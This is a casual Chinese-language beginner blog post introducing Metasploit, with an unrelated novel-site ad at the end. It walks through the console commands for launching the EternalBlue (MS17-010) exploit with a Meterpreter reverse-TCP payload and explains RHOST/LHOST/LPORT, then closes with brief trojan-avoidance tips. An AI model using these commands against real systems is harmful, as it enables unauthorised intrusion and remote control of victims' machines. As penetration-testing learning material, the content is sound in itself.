非常“刑”的工具（出事我概不负责）--metasploit

简介：

Metasploit Framework(MSF)是一款开源安全漏洞检测工具，附带数千个已知的软件漏洞，并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程，被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的，但是再后来的新版中，改成了用Ruby语言编写的了。在kali中，自带了Metasploit工具。

作者最先接触的就是它，极为好用！！！

强烈推荐！！！

而且其中自带nmap，hydra等工具。

基础使用：

msfconsole #进入框架

search ms17_010 # 使用search命令查找相关漏洞

use exploit/windows/smb/ms17_010_eternalblue # 使用use进入模块

info #使用info查看模块信息

set payload windows/x64/meterpreter/reverse_tcp #设置攻击载荷

show options #查看模块需要配置的参数

set RHOST ip #设置参数

exploit / run #攻击

注：上面的ms-17-010-是永恒之蓝漏洞-比较著名的漏洞

上面的是一个演示。

当你想要找一个漏洞时，输入search +

我以前就这样试过，结果啥也没试出来......

但是还是很有用的。

你也可以直接输入search

找到你想用的漏洞时，就输入use+编号 或者是use +名称（可以使用tab补全，输入前几个字母（是我在游戏里学的）就像exploit，你可以输入exp，按tab，前提是里面没有除了exploit以外exp开头的单词）

据我了解到的，metasploit不止它一个，还有msfconve和meterpreter

只要输入相应的单词就可以利用相应的模块（因为msf本身就是集成模块）

注：msf是metasploit的命令提示符，我们将metasploit称为msf

在使用好漏洞时，输入show options，从而查出相应的配置

比如：rhost是目标主机

lhost是发动攻击的主机

lport是所用端口

在配置好后，就可以输入run或exploit开始攻击

如果出现了msf

就说明完成了，之后再分析爆出来的代码，判断是否成功。

其实我还是想教给大家关于木马的制作。但由于不会过审，所以就先教给大家木马的防范方法吧。

一般在你浏览一些违规网站时，3XX就会提醒你有木马。这个时候就尽量不要点进去，因为你一旦点进去，对方就可以在瞬间取得你的权限（这就有点超纲了，这属于是后渗透阶段了）

注意尤其是.exe的文件，是木马的可能性极高，来路不明的文件也有可能。

少年，你想学黑客吗？想学？我教你啊！提示您：看后求收藏（同创文学网http://www.tcwxx.com），接着再看更方便。